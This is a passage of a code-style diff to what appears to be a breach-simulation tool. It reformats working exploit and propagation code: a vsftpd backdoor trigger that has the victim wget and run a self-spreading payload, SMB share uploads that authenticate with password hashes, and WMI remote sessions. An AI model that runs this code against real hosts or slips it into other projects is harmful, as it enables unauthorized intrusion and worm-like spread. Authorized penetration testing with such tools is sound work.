zerologon_exploiter_object._extracted_creds == expected_extracted_creds diff --git a/monkey/infection_monkey/exploit/tests/zerologon_utils/test_vuln_assessment.py b/monkey/infection_monkey/exploit/tests/zerologon_utils/test_vuln_assessment.py index ca598ce7c..99ab690b4 100644 --- a/monkey/infection_monkey/exploit/tests/zerologon_utils/test_vuln_assessment.py +++ b/monkey/infection_monkey/exploit/tests/zerologon_utils/test_vuln_assessment.py @@ -2,8 +2,7 @@ import pytest from nmb.NetBIOS import NetBIOS from common.utils.exceptions import DomainControllerNameFetchError -from infection_monkey.exploit.zerologon_utils.vuln_assessment import \ - get_dc_details +from infection_monkey.exploit.zerologon_utils.vuln_assessment import get_dc_details from infection_monkey.model.host import VictimHost @@ -19,6 +18,7 @@ def host(): def _get_stub_queryIPForName(netbios_names): def stub_queryIPForName(*args, **kwargs): return netbios_names + return stub_queryIPForName diff --git a/monkey/infection_monkey/exploit/tools/helpers.py b/monkey/infection_monkey/exploit/tools/helpers.py index 901202d2d..cf94f6edc 100644 --- a/monkey/infection_monkey/exploit/tools/helpers.py +++ b/monkey/infection_monkey/exploit/tools/helpers.py @@ -19,19 +19,20 @@ def get_target_monkey(host): if host.monkey_exe: return host.monkey_exe - if not host.os.get('type'): + if not host.os.get("type"): return None monkey_path = ControlClient.download_monkey_exe(host) - if host.os.get('machine') and monkey_path: + if host.os.get("machine") and monkey_path: host.monkey_exe = monkey_path if not monkey_path: - if host.os.get('type') == platform.system().lower(): + if host.os.get("type") == platform.system().lower(): # if exe not found, and we have the same arch or arch is unknown and we are 32bit, use our exe - if (not host.os.get('machine') and sys.maxsize < 2 ** 32) or \ - host.os.get('machine', '').lower() == platform.machine().lower(): + if (not host.os.get("machine") and sys.maxsize < 2 ** 32) or host.os.get( + "machine", "" + ).lower() == platform.machine().lower(): monkey_path = sys.executable return monkey_path @@ -39,11 +40,13 @@ def get_target_monkey(host): def get_target_monkey_by_os(is_windows, is_32bit): from infection_monkey.control import ControlClient + return ControlClient.download_monkey_exe_by_os(is_windows, is_32bit) -def build_monkey_commandline_explicitly(parent=None, tunnel=None, server=None, depth=None, location=None, - vulnerable_port=None): +def build_monkey_commandline_explicitly( + parent=None, tunnel=None, server=None, depth=None, location=None, vulnerable_port=None +): cmdline = "" if parent is not None: @@ -66,12 +69,20 @@ def build_monkey_commandline_explicitly(parent=None, tunnel=None, server=None, d def build_monkey_commandline(target_host, depth, vulnerable_port, location=None): from infection_monkey.config import GUID + return build_monkey_commandline_explicitly( - GUID, target_host.default_tunnel, target_host.default_server, depth, location, vulnerable_port) + GUID, + target_host.default_tunnel, + target_host.default_server, + depth, + location, + vulnerable_port, + ) def get_monkey_depth(): from infection_monkey.config import WormConfiguration + return WormConfiguration.depth @@ -82,21 +93,26 @@ def get_monkey_dest_path(url_to_monkey): :return: Corresponding monkey path from configuration """ from infection_monkey.config import WormConfiguration - if not url_to_monkey or ('linux' not in url_to_monkey and 'windows' not in url_to_monkey): + + if not url_to_monkey or ("linux" not in url_to_monkey and "windows" not in url_to_monkey): LOG.error("Can't get destination path because source path %s is invalid.", url_to_monkey) return False try: - if 'linux' in url_to_monkey: + if "linux" in url_to_monkey: return WormConfiguration.dropper_target_path_linux - elif 'windows-32' in url_to_monkey: + elif "windows-32" in url_to_monkey: return WormConfiguration.dropper_target_path_win_32 - elif 'windows-64' in url_to_monkey: + elif "windows-64" in url_to_monkey: return WormConfiguration.dropper_target_path_win_64 else: - LOG.error("Could not figure out what type of monkey server was trying to upload, " - "thus destination path can not be chosen.") + LOG.error( + "Could not figure out what type of monkey server was trying to upload, " + "thus destination path can not be chosen." + ) return False except AttributeError: - LOG.error("Seems like monkey's source configuration property names changed. " - "Can not get destination path to upload monkey") + LOG.error( + "Seems like monkey's source configuration property names changed. " + "Can not get destination path to upload monkey" + ) return False diff --git a/monkey/infection_monkey/exploit/tools/http_tools.py b/monkey/infection_monkey/exploit/tools/http_tools.py index 3857c2cc9..d186adbab 100644 --- a/monkey/infection_monkey/exploit/tools/http_tools.py +++ b/monkey/infection_monkey/exploit/tools/http_tools.py @@ -13,13 +13,12 @@ from infection_monkey.network.info import get_free_tcp_port from infection_monkey.network.tools import get_interface_to_target from infection_monkey.transport import HTTPServer, LockedHTTPServer -__author__ = 'itamar' +__author__ = "itamar" LOG = logging.getLogger(__name__) class HTTPTools(object): - @staticmethod def create_transfer(host, src_path, local_ip=None, local_port=None): if not local_port: @@ -35,11 +34,17 @@ class HTTPTools(object): httpd.daemon = True httpd.start() - return "http://%s:%s/%s" % (local_ip, local_port, urllib.parse.quote(os.path.basename(src_path))), httpd + return ( + "http://%s:%s/%s" + % (local_ip, local_port, urllib.parse.quote(os.path.basename(src_path))), + httpd, + ) @staticmethod def try_create_locked_transfer(host, src_path, local_ip=None, local_port=None): - http_path, http_thread = HTTPTools.create_locked_transfer(host, src_path, local_ip, local_port) + http_path, http_thread = HTTPTools.create_locked_transfer( + host, src_path, local_ip, local_port + ) if not http_path: raise Exception("Http transfer creation failed.") LOG.info("Started http server on %s", http_path) @@ -71,7 +76,11 @@ class HTTPTools(object): httpd = LockedHTTPServer(local_ip, local_port, src_path, lock) httpd.start() lock.acquire() - return "http://%s:%s/%s" % (local_ip, local_port, urllib.parse.quote(os.path.basename(src_path))), httpd + return ( + "http://%s:%s/%s" + % (local_ip, local_port, urllib.parse.quote(os.path.basename(src_path))), + httpd, + ) @staticmethod def get_port_from_url(url: str) -> int: @@ -88,7 +97,9 @@ class MonkeyHTTPServer(HTTPTools): def start(self): # Get monkey exe for host and it's path src_path = try_get_target_monkey(self.host) - self.http_path, self.http_thread = MonkeyHTTPServer.try_create_locked_transfer(self.host, src_path) + self.http_path, self.http_thread = MonkeyHTTPServer.try_create_locked_transfer( + self.host, src_path + ) def stop(self): if not self.http_path or not self.http_thread: diff --git a/monkey/infection_monkey/exploit/tools/payload_parsing.py b/monkey/infection_monkey/exploit/tools/payload_parsing.py index 5c4415fe3..052ab18e5 100644 --- a/monkey/infection_monkey/exploit/tools/payload_parsing.py +++ b/monkey/infection_monkey/exploit/tools/payload_parsing.py @@ -45,15 +45,17 @@ class LimitedSizePayload(Payload): def split_into_array_of_smaller_payloads(self): if self.is_suffix_and_prefix_too_long(): - raise Exception("Can't split command into smaller sub-commands because commands' prefix and suffix already " - "exceeds required length of command.") + raise Exception( + "Can't split command into smaller sub-commands because commands' prefix and suffix already " + "exceeds required length of command." + ) elif self.command == "": return [self.prefix + self.suffix] - wrapper = textwrap.TextWrapper(drop_whitespace=False, width=self.get_max_sub_payload_length()) - commands = [self.get_payload(part) - for part - in wrapper.wrap(self.command)] + wrapper = textwrap.TextWrapper( + drop_whitespace=False, width=self.get_max_sub_payload_length() + ) + commands = [self.get_payload(part) for part in wrapper.wrap(self.command)] return commands def get_max_sub_payload_length(self): diff --git a/monkey/infection_monkey/exploit/tools/payload_parsing_test.py b/monkey/infection_monkey/exploit/tools/payload_parsing_test.py index 2aaa6dc12..18dcf6df2 100644 --- a/monkey/infection_monkey/exploit/tools/payload_parsing_test.py +++ b/monkey/infection_monkey/exploit/tools/payload_parsing_test.py @@ -13,20 +13,26 @@ class TestPayload(TestCase): def test_is_suffix_and_prefix_too_long(self): pld_fail = LimitedSizePayload("b", 2, "a", "c") pld_success = LimitedSizePayload("b", 3, "a", "c") - assert pld_fail.is_suffix_and_prefix_too_long() and not pld_success.is_suffix_and_prefix_too_long() + assert ( + pld_fail.is_suffix_and_prefix_too_long() + and not pld_success.is_suffix_and_prefix_too_long() + ) def test_split_into_array_of_smaller_payloads(self): test_str1 = "123456789" pld1 = LimitedSizePayload(test_str1, max_length=16, prefix="prefix", suffix="suffix") array1 = pld1.split_into_array_of_smaller_payloads() - test1 = bool(array1[0] == "prefix1234suffix" and - array1[1] == "prefix5678suffix" and - array1[2] == "prefix9suffix") + test1 = bool( + array1[0] == "prefix1234suffix" + and array1[1] == "prefix5678suffix" + and array1[2] == "prefix9suffix" + ) test_str2 = "12345678" pld2 = LimitedSizePayload(test_str2, max_length=16, prefix="prefix", suffix="suffix") array2 = pld2.split_into_array_of_smaller_payloads() - test2 = bool(array2[0] == "prefix1234suffix" and - array2[1] == "prefix5678suffix" and len(array2) == 2) + test2 = bool( + array2[0] == "prefix1234suffix" and array2[1] == "prefix5678suffix" and len(array2) == 2 + ) assert test1 and test2 diff --git a/monkey/infection_monkey/exploit/tools/smb_tools.py b/monkey/infection_monkey/exploit/tools/smb_tools.py index 705f691e5..9943b4135 100644 --- a/monkey/infection_monkey/exploit/tools/smb_tools.py +++ b/monkey/infection_monkey/exploit/tools/smb_tools.py @@ -13,32 +13,37 @@ from infection_monkey.config import Configuration from infection_monkey.network.tools import get_interface_to_target from infection_monkey.telemetry.attack.t1105_telem import T1105Telem -__author__ = 'itamar' +__author__ = "itamar" LOG = logging.getLogger(__name__) class SmbTools(object): - @staticmethod - def copy_file(host, src_path, dst_path, username, password, lm_hash='', ntlm_hash='', timeout=60): + def copy_file( + host, src_path, dst_path, username, password, lm_hash="", ntlm_hash="", timeout=60 + ): assert monkeyfs.isfile(src_path), "Source file to copy (%s) is missing" % (src_path,) config = infection_monkey.config.WormConfiguration src_file_size = monkeyfs.getsize(src_path) - smb, dialect = SmbTools.new_smb_connection(host, username, password, lm_hash, ntlm_hash, timeout) + smb, dialect = SmbTools.new_smb_connection( + host, username, password, lm_hash, ntlm_hash, timeout + ) if not smb: return None # skip guest users if smb.isGuestSession() > 0: - LOG.debug("Connection to %r granted guest privileges with user: %s, password (SHA-512): '%s'," - " LM hash (SHA-512): %s, NTLM hash (SHA-512): %s", - host, - username, - Configuration.hash_sensitive_data(password), - Configuration.hash_sensitive_data(lm_hash), - Configuration.hash_sensitive_data(ntlm_hash)) + LOG.debug( + "Connection to %r granted guest privileges with user: %s, password (SHA-512): '%s'," + " LM hash (SHA-512): %s, NTLM hash (SHA-512): %s", + host, + username, + Configuration.hash_sensitive_data(password), + Configuration.hash_sensitive_data(lm_hash), + Configuration.hash_sensitive_data(ntlm_hash), + ) try: smb.logoff() @@ -50,53 +55,57 @@ class SmbTools(object): try: resp = SmbTools.execute_rpc_call(smb, "hNetrServerGetInfo", 102) except Exception as exc: - LOG.debug("Error requesting server info from %r over SMB: %s", - host, exc) + LOG.debug("Error requesting server info from %r over SMB: %s", host, exc) return None - info = {'major_version': resp['InfoStruct']['ServerInfo102']['sv102_version_major'], - 'minor_version': resp['InfoStruct']['ServerInfo102']['sv102_version_minor'], - 'server_name': resp['InfoStruct']['ServerInfo102']['sv102_name'].strip("\0 "), - 'server_comment': resp['InfoStruct']['ServerInfo102']['sv102_comment'].strip("\0 "), - 'server_user_path': resp['InfoStruct']['ServerInfo102']['sv102_userpath'].strip("\0 "), - 'simultaneous_users': resp['InfoStruct']['ServerInfo102']['sv102_users']} + info = { + "major_version": resp["InfoStruct"]["ServerInfo102"]["sv102_version_major"], + "minor_version": resp["InfoStruct"]["ServerInfo102"]["sv102_version_minor"], + "server_name": resp["InfoStruct"]["ServerInfo102"]["sv102_name"].strip("\0 "), + "server_comment": resp["InfoStruct"]["ServerInfo102"]["sv102_comment"].strip("\0 "), + "server_user_path": resp["InfoStruct"]["ServerInfo102"]["sv102_userpath"].strip("\0 "), + "simultaneous_users": resp["InfoStruct"]["ServerInfo102"]["sv102_users"], + } - LOG.debug("Connected to %r using %s:\n%s", - host, dialect, pprint.pformat(info)) + LOG.debug("Connected to %r using %s:\n%s", host, dialect, pprint.pformat(info)) try: resp = SmbTools.execute_rpc_call(smb, "hNetrShareEnum", 2) except Exception as exc: - LOG.debug("Error enumerating server shares from %r over SMB: %s", - host, exc) + LOG.debug("Error enumerating server shares from %r over SMB: %s", host, exc) return None - resp = resp['InfoStruct']['ShareInfo']['Level2']['Buffer'] + resp = resp["InfoStruct"]["ShareInfo"]["Level2"]["Buffer"] high_priority_shares = () low_priority_shares = () file_name = ntpath.split(dst_path)[-1] for i in range(len(resp)): - share_name = resp[i]['shi2_netname'].strip("\0 ") - share_path = resp[i]['shi2_path'].strip("\0 ") - current_uses = resp[i]['shi2_current_uses'] - max_uses = resp[i]['shi2_max_uses'] + share_name = resp[i]["shi2_netname"].strip("\0 ") + share_path = resp[i]["shi2_path"].strip("\0 ") + current_uses = resp[i]["shi2_current_uses"] + max_uses = resp[i]["shi2_max_uses"] if current_uses >= max_uses: - LOG.debug("Skipping share '%s' on victim %r because max uses is exceeded", - share_name, host) + LOG.debug( + "Skipping share '%s' on victim %r because max uses is exceeded", + share_name, + host, + ) continue elif not share_path: - LOG.debug("Skipping share '%s' on victim %r because share path is invalid", - share_name, host) + LOG.debug( + "Skipping share '%s' on victim %r because share path is invalid", + share_name, + host, + ) continue - share_info = {'share_name': share_name, - 'share_path': share_path} + share_info = {"share_name": share_name, "share_path": share_path} if dst_path.lower().startswith(share_path.lower()): - high_priority_shares += ((ntpath.sep + dst_path[len(share_path):], share_info),) + high_priority_shares += ((ntpath.sep + dst_path[len(share_path) :], share_info),) low_priority_shares += ((ntpath.sep + file_name, share_info),) @@ -104,23 +113,31 @@ class SmbTools(object): file_uploaded = False for remote_path, share in shares: - share_name = share['share_name'] - share_path = share['share_path'] + share_name = share["share_name"] + share_path = share["share_path"] if not smb: - smb, _ = SmbTools.new_smb_connection(host, username, password, lm_hash, ntlm_hash, timeout) + smb, _ = SmbTools.new_smb_connection( + host, username, password, lm_hash, ntlm_hash, timeout + ) if not smb: return None try: smb.connectTree(share_name) except Exception as exc: - LOG.debug("Error connecting tree to share '%s' on victim %r: %s", - share_name, host, exc) + LOG.debug( + "Error connecting tree to share '%s' on victim %r: %s", share_name, host, exc + ) continue - LOG.debug("Trying to copy monkey file to share '%s' [%s + %s] on victim %r", - share_name, share_path, remote_path, host.ip_addr[0], ) + LOG.debug( + "Trying to copy monkey file to share '%s' [%s + %s] on victim %r", + share_name, + share_path, + remote_path, + host.ip_addr[0], + ) remote_full_path = ntpath.join(share_path, remote_path.strip(ntpath.sep)) @@ -133,32 +150,41 @@ class SmbTools(object): LOG.debug("Remote monkey file is same as source, skipping copy") return remote_full_path - LOG.debug("Remote monkey file is found but different, moving along with attack") + LOG.debug( + "Remote monkey file is found but different, moving along with attack" + ) except Exception: pass # file isn't found on remote victim, moving on try: - with monkeyfs.open(src_path, 'rb') as source_file: + with monkeyfs.open(src_path, "rb") as source_file: # make sure of the timeout smb.setTimeout(timeout) smb.putFile(share_name, remote_path, source_file.read) file_uploaded = True - T1105Telem(ScanStatus.USED, - get_interface_to_target(host.ip_addr), - host.ip_addr, - dst_path).send() - LOG.info("Copied monkey file '%s' to remote share '%s' [%s] on victim %r", - src_path, share_name, share_path, host) + T1105Telem( + ScanStatus.USED, get_interface_to_target(host.ip_addr), host.ip_addr, dst_path + ).send() + LOG.info( + "Copied monkey file '%s' to remote share '%s' [%s] on victim %r", + src_path, + share_name, + share_path, + host, + ) break except Exception as exc: - LOG.debug("Error uploading monkey to share '%s' on victim %r: %s", - share_name, host, exc) - T1105Telem(ScanStatus.SCANNED, - get_interface_to_target(host.ip_addr), - host.ip_addr, - dst_path).send() + LOG.debug( + "Error uploading monkey to share '%s' on victim %r: %s", share_name, host, exc + ) + T1105Telem( + ScanStatus.SCANNED, + get_interface_to_target(host.ip_addr), + host.ip_addr, + dst_path, + ).send() continue finally: try: @@ -169,39 +195,41 @@ class SmbTools(object): smb = None if not file_uploaded: - LOG.debug("Couldn't find a writable share for exploiting victim %r with " - "username: %s, password (SHA-512): '%s', LM hash (SHA-512): %s, NTLM hash (SHA-512): %s", - host, - username, - Configuration.hash_sensitive_data(password), - Configuration.hash_sensitive_data(lm_hash), - Configuration.hash_sensitive_data(ntlm_hash)) + LOG.debug( + "Couldn't find a writable share for exploiting victim %r with " + "username: %s, password (SHA-512): '%s', LM hash (SHA-512): %s, NTLM hash (SHA-512): %s", + host, + username, + Configuration.hash_sensitive_data(password), + Configuration.hash_sensitive_data(lm_hash), + Configuration.hash_sensitive_data(ntlm_hash), + ) return None return remote_full_path @staticmethod - def new_smb_connection(host, username, password, lm_hash='', ntlm_hash='', timeout=60): + def new_smb_connection(host, username, password, lm_hash="", ntlm_hash="", timeout=60): try: smb = SMBConnection(host.ip_addr, host.ip_addr, sess_port=445) except Exception as exc: - LOG.debug("SMB connection to %r on port 445 failed," - " trying port 139 (%s)", host, exc) + LOG.debug("SMB connection to %r on port 445 failed," " trying port 139 (%s)", host, exc) try: - smb = SMBConnection('*SMBSERVER', host.ip_addr, sess_port=139) + smb = SMBConnection("*SMBSERVER", host.ip_addr, sess_port=139) except Exception as exc: - LOG.debug("SMB connection to %r on port 139 failed as well (%s)", - host, exc) + LOG.debug("SMB connection to %r on port 139 failed as well (%s)", host, exc) return None, None - dialect = {SMB_DIALECT: "SMBv1", - SMB2_DIALECT_002: "SMBv2.0", - SMB2_DIALECT_21: "SMBv2.1"}.get(smb.getDialect(), "SMBv3.0") + dialect = { + SMB_DIALECT: "SMBv1", + SMB2_DIALECT_002: "SMBv2.0", + SMB2_DIALECT_21: "SMBv2.1", + }.get(smb.getDialect(), "SMBv3.0") # we know this should work because the WMI connection worked try: - smb.login(username, password, '', lm_hash, ntlm_hash) + smb.login(username, password, "", lm_hash, ntlm_hash) except Exception as exc: LOG.debug( "Error while logging into %r using user: %s, password (SHA-512): '%s', " @@ -211,7 +239,8 @@ class SmbTools(object): Configuration.hash_sensitive_data(password), Configuration.hash_sensitive_data(lm_hash), Configuration.hash_sensitive_data(ntlm_hash), - exc) + exc, + ) return None, dialect smb.setTimeout(timeout) @@ -228,10 +257,9 @@ class SmbTools(object): @staticmethod def get_dce_bind(smb): - rpctransport = transport.SMBTransport(smb.getRemoteHost(), - smb.getRemoteHost(), - filename=r'\srvsvc', - smb_connection=smb) + rpctransport = transport.SMBTransport( + smb.getRemoteHost(), smb.getRemoteHost(), filename=r"\srvsvc", smb_connection=smb + ) dce = rpctransport.get_dce_rpc() dce.connect() dce.bind(srvs.MSRPC_UUID_SRVS) diff --git a/monkey/infection_monkey/exploit/tools/test_helpers.py b/monkey/infection_monkey/exploit/tools/test_helpers.py index 5d7dd422d..60cc136e5 100644 --- a/monkey/infection_monkey/exploit/tools/test_helpers.py +++ b/monkey/infection_monkey/exploit/tools/test_helpers.py @@ -4,25 +4,20 @@ from infection_monkey.exploit.tools.helpers import build_monkey_commandline_expl class TestHelpers(unittest.TestCase): - def test_build_monkey_commandline_explicitly(self): test1 = " -p 101010 -t 10.10.101.10 -s 127.127.127.127:5000 -d 0 -l C:\\windows\\abc -vp 80" - result1 = build_monkey_commandline_explicitly(101010, - "10.10.101.10", - "127.127.127.127:5000", - 0, - "C:\\windows\\abc", - 80) + result1 = build_monkey_commandline_explicitly( + 101010, "10.10.101.10", "127.127.127.127:5000", 0, "C:\\windows\\abc", 80 + ) test2 = " -p parent -s 127.127.127.127:5000 -d 0 -vp 80" - result2 = build_monkey_commandline_explicitly(parent="parent", - server="127.127.127.127:5000", - depth="0", - vulnerable_port="80") + result2 = build_monkey_commandline_explicitly( + parent="parent", server="127.127.127.127:5000", depth="0", vulnerable_port="80" + ) self.assertEqual(test1, result1) self.assertEqual(test2, result2) -if __name__ == '__main__': +if __name__ == "__main__": unittest.main() diff --git a/monkey/infection_monkey/exploit/tools/wmi_tools.py b/monkey/infection_monkey/exploit/tools/wmi_tools.py index f62190076..b6d96aa82 100644 --- a/monkey/infection_monkey/exploit/tools/wmi_tools.py +++ b/monkey/infection_monkey/exploit/tools/wmi_tools.py @@ -5,7 +5,7 @@ from impacket.dcerpc.v5.dcom.wmi import DCERPCSessionError from impacket.dcerpc.v5.dcomrt import DCOMConnection from impacket.dcerpc.v5.dtypes import NULL -__author__ = 'itamar' +__author__ = "itamar" LOG = logging.getLogger(__name__) @@ -16,8 +16,10 @@ class DceRpcException(Exception): class AccessDeniedException(Exception): def __init__(self, host, username, password, domain): - super(AccessDeniedException, self).__init__("Access is denied to %r with username %s\\%s and password %r" % - (host, domain, username, password)) + super(AccessDeniedException, self).__init__( + "Access is denied to %r with username %s\\%s and password %r" + % (host, domain, username, password) + ) class WmiTools(object): @@ -34,17 +36,20 @@ class WmiTools(object): if not domain: domain = host.ip_addr - dcom = DCOMConnection(host.ip_addr, - username=username, - password=password, - domain=domain, - lmhash=lmhash, - nthash=nthash, - oxidResolver=True) + dcom = DCOMConnection( + host.ip_addr, + username=username, + password=password, + domain=domain, + lmhash=lmhash, + nthash=nthash, + oxidResolver=True, + ) try: - iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, - wmi.IID_IWbemLevel1Login) + iInterface = dcom.CoCreateInstanceEx( + wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login + ) except Exception as exc: dcom.disconnect() @@ -56,7 +61,7 @@ class WmiTools(object): iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface) try: - self._iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL) + self._iWbemServices = iWbemLevel1Login.NTLMLogin("//./root/cimv2", NULL, NULL) self._dcom = dcom except Exception: dcom.disconnect() @@ -128,7 +133,7 @@ class WmiTools(object): try: while True: try: - next_item = iEnumWbemClassObject.Next(0xffffffff, 1)[0] + next_item = iEnumWbemClassObject.Next(0xFFFFFFFF, 1)[0] record = next_item.getProperties() if not fields: @@ -136,7 +141,7 @@ class WmiTools(object): query_record = {} for key in fields: - query_record[key] = record[key]['value'] + query_record[key] = record[key]["value"] query.append(query_record) except DCERPCSessionError as exc: diff --git a/monkey/infection_monkey/exploit/vsftpd.py b/monkey/infection_monkey/exploit/vsftpd.py index f2e355802..d8e88b44c 100644 --- a/monkey/infection_monkey/exploit/vsftpd.py +++ b/monkey/infection_monkey/exploit/vsftpd.py @@ -10,14 +10,24 @@ from logging import getLogger from common.utils.attack_utils import ScanStatus from infection_monkey.exploit.HostExploiter import HostExploiter -from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth, get_target_monkey +from infection_monkey.exploit.tools.helpers import ( + build_monkey_commandline, + get_monkey_depth, + get_target_monkey, +) from infection_monkey.exploit.tools.http_tools import HTTPTools -from infection_monkey.model import CHMOD_MONKEY, DOWNLOAD_TIMEOUT, MONKEY_ARG, RUN_MONKEY, WGET_HTTP_UPLOAD +from infection_monkey.model import ( + CHMOD_MONKEY, + DOWNLOAD_TIMEOUT, + MONKEY_ARG, + RUN_MONKEY, + WGET_HTTP_UPLOAD, +) from infection_monkey.telemetry.attack.t1222_telem import T1222Telem LOG = getLogger(__name__) -__author__ = 'D3fa1t' +__author__ = "D3fa1t" FTP_PORT = 21 # port at which vsftpd runs BACKDOOR_PORT = 6200 # backdoor port @@ -25,14 +35,14 @@ RECV_128 = 128 # In Bytes UNAME_M = "uname -m" ULIMIT_V = "ulimit -v " # To increase the memory limit UNLIMITED = "unlimited;" -USERNAME = b'USER D3fa1t:)' # Ftp Username should end with :) to trigger the backdoor -PASSWORD = b'PASS please' # Ftp Password +USERNAME = b"USER D3fa1t:)" # Ftp Username should end with :) to trigger the backdoor +PASSWORD = b"PASS please" # Ftp Password FTP_TIME_BUFFER = 1 # In seconds class VSFTPDExploiter(HostExploiter): - _TARGET_OS_TYPE = ['linux'] - _EXPLOITED_SERVICE = 'VSFTPD' + _TARGET_OS_TYPE = ["linux"] + _EXPLOITED_SERVICE = "VSFTPD" def __init__(self, host): self._update_timestamp = 0 @@ -44,15 +54,15 @@ class VSFTPDExploiter(HostExploiter): s.connect((ip_addr, port)) return True except socket.error as e: - LOG.info('Failed to connect to %s: %s', self.host.ip_addr, str(e)) + LOG.info("Failed to connect to %s: %s", self.host.ip_addr, str(e)) return False def socket_send_recv(self, s, message): try: s.send(message) - return s.recv(RECV_128).decode('utf-8') + return s.recv(RECV_128).decode("utf-8") except socket.error as e: - LOG.info('Failed to send payload to %s: %s', self.host.ip_addr, str(e)) + LOG.info("Failed to send payload to %s: %s", self.host.ip_addr, str(e)) return False def socket_send(self, s, message): @@ -60,7 +70,7 @@ class VSFTPDExploiter(HostExploiter): s.send(message) return True except socket.error as e: - LOG.info('Failed to send payload to %s: %s', self.host.ip_addr, str(e)) + LOG.info("Failed to send payload to %s: %s", self.host.ip_addr, str(e)) return False def _exploit_host(self): @@ -68,32 +78,32 @@ class VSFTPDExploiter(HostExploiter): ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) if self.socket_connect(ftp_socket, self.host.ip_addr, FTP_PORT): - ftp_socket.recv(RECV_128).decode('utf-8') + ftp_socket.recv(RECV_128).decode("utf-8") - if self.socket_send_recv(ftp_socket, USERNAME + b'\n'): + if self.socket_send_recv(ftp_socket, USERNAME + b"\n"): time.sleep(FTP_TIME_BUFFER) - self.socket_send(ftp_socket, PASSWORD + b'\n') + self.socket_send(ftp_socket, PASSWORD + b"\n") ftp_socket.close() - LOG.info('Backdoor Enabled, Now we can run commands') + LOG.info("Backdoor Enabled, Now we can run commands") else: - LOG.error('Failed to trigger backdoor on %s', self.host.ip_addr) + LOG.error("Failed to trigger backdoor on %s", self.host.ip_addr) return False - LOG.info('Attempting to connect to backdoor...') + LOG.info("Attempting to connect to backdoor...") backdoor_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) if self.socket_connect(backdoor_socket, self.host.ip_addr, BACKDOOR_PORT): - LOG.info('Connected to backdoor on %s:6200', self.host.ip_addr) + LOG.info("Connected to backdoor on %s:6200", self.host.ip_addr) - uname_m = str.encode(UNAME_M + '\n') + uname_m = str.encode(UNAME_M + "\n") response = self.socket_send_recv(backdoor_socket, uname_m) if response: - LOG.info('Response for uname -m: %s', response) - if '' != response.lower().strip(): + LOG.info("Response for uname -m: %s", response) + if "" != response.lower().strip(): # command execution is successful - self.host.os['machine'] = response.lower().strip() - self.host.os['type'] = 'linux' + self.host.os["machine"] = response.lower().strip() + self.host.os["type"] = "linux" else: LOG.info("Failed to execute command uname -m on victim %r ", self.host) @@ -111,39 +121,47 @@ class VSFTPDExploiter(HostExploiter): # Upload the monkey to the machine monkey_path = dropper_target_path_linux - download_command = WGET_HTTP_UPLOAD % {'monkey_path': monkey_path, 'http_path': http_path} - download_command = str.encode(str(download_command) + '\n') + download_command = WGET_HTTP_UPLOAD % {"monkey_path": monkey_path, "http_path": http_path} + download_command = str.encode(str(download_command) + "\n") LOG.info("Download command is %s", download_command) if self.socket_send(backdoor_socket, download_command): - LOG.info('Monkey is now Downloaded ') + LOG.info("Monkey is now Downloaded ") else: - LOG.error('Failed to download monkey at %s', self.host.ip_addr) + LOG.error("Failed to download monkey at %s", self.host.ip_addr) return False http_thread.join(DOWNLOAD_TIMEOUT) http_thread.stop() # Change permissions - change_permission = CHMOD_MONKEY % {'monkey_path': monkey_path} - change_permission = str.encode(str(change_permission) + '\n') + change_permission = CHMOD_MONKEY % {"monkey_path": monkey_path} + change_permission = str.encode(str(change_permission) + "\n") LOG.info("change_permission command is %s", change_permission) backdoor_socket.send(change_permission) T1222Telem(ScanStatus.USED, change_permission.decode(), self.host).send() # Run monkey on the machine - parameters = build_monkey_commandline(self.host, - get_monkey_depth() - 1, - vulnerable_port=FTP_PORT) - run_monkey = RUN_MONKEY % {'monkey_path': monkey_path, 'monkey_type': MONKEY_ARG, 'parameters': parameters} + parameters = build_monkey_commandline( + self.host, get_monkey_depth() - 1, vulnerable_port=FTP_PORT + ) + run_monkey = RUN_MONKEY % { + "monkey_path": monkey_path, + "monkey_type": MONKEY_ARG, + "parameters": parameters, + } # Set unlimited to memory # we don't have to revert the ulimit because it just applies to the shell obtained by our exploit run_monkey = ULIMIT_V + UNLIMITED + run_monkey - run_monkey = str.encode(str(run_monkey) + '\n') + run_monkey = str.encode(str(run_monkey) + "\n") time.sleep(FTP_TIME_BUFFER) if backdoor_socket.send(run_monkey): - LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", self._config.dropper_target_path_linux, - self.host, run_monkey) + LOG.info( + "Executed monkey '%s' on remote victim %r (cmdline=%r)", + self._config.dropper_target_path_linux, + self.host, + run_monkey, + ) self.add_executed_cmd(run_monkey.decode()) return True else: diff --git a/monkey/infection_monkey/exploit/web_rce.py b/monkey/infection_monkey/exploit/web_rce.py index 069cbcada..f51fe1539 100644 --- a/monkey/infection_monkey/exploit/web_rce.py +++ b/monkey/infection_monkey/exploit/web_rce.py @@ -5,16 +5,31 @@ from posixpath import join from common.utils.attack_utils import BITS_UPLOAD_STRING, ScanStatus from infection_monkey.exploit.HostExploiter import HostExploiter -from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth, get_target_monkey +from infection_monkey.exploit.tools.helpers import ( + build_monkey_commandline, + get_monkey_depth, + get_target_monkey, +) from infection_monkey.exploit.tools.http_tools import HTTPTools -from infection_monkey.model import (BITSADMIN_CMDLINE_HTTP, CHECK_COMMAND, CHMOD_MONKEY, DOWNLOAD_TIMEOUT, DROPPER_ARG, - GET_ARCH_LINUX, GET_ARCH_WINDOWS, ID_STRING, MONKEY_ARG, POWERSHELL_HTTP_UPLOAD, - RUN_MONKEY, WGET_HTTP_UPLOAD) +from infection_monkey.model import ( + BITSADMIN_CMDLINE_HTTP, + CHECK_COMMAND, + CHMOD_MONKEY, + DOWNLOAD_TIMEOUT, + DROPPER_ARG, + GET_ARCH_LINUX, + GET_ARCH_WINDOWS, + ID_STRING, + MONKEY_ARG, + POWERSHELL_HTTP_UPLOAD, + RUN_MONKEY, + WGET_HTTP_UPLOAD, +) from infection_monkey.network.tools import check_tcp_port, tcp_port_to_service from infection_monkey.telemetry.attack.t1197_telem import T1197Telem from infection_monkey.telemetry.attack.t1222_telem import T1222Telem -__author__ = 'VakarisZ' +__author__ = "VakarisZ" LOG = logging.getLogger(__name__) # Command used to check if monkeys already exists @@ -26,7 +41,6 